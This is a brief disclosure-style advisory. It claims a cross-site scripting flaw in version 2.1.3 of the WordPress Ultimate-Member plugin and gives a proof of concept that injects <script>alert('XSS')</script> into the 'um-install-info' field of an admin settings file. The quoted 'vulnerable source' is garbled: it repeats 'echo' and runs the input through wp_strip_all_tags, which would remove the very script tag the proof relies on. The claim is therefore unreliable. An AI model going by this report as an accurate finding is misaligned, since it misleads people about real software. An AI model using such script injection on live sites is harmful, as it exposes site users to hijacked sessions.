WordPress Ultimate-Member plugin version 2.1.3 suffers from a cross site scripting vulnerability.
3cbf268b58052c6f4f6bdd7d408ea24c[-] Title : word press plugin ultimate-member 2.1.3 - Cross Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/ultimate-member/
[-] Category : Webapps
[-] Date : 2020-02-20
==============================================================================================
Vulnerable Page:
ultimate-member/includes/admin/core/class-admin-settings.php
==============================================================================================
Vulnerable Source:
2876: echo echo wp_strip_all_tags($_POST['um-install-info']);
===============================================================================================
POC :
http://localhost/wp-content/plugins/ultimate-member/includes/admin/core/class-admin-settings.php
step 1 = Go To Web Page =
http://localhost/wp-content/plugins/ultimate-member/includes/admin/core/class-admin-settings.php
Step 2 = In the box : "um-install-info"
Step 3 = input box , Add JavaScript Code : <script>alert('XSS')</script>
===============================================================================================
************************
* ==> Contact With We :
* Telegram : @MF0584
* Email : [email protected]
************************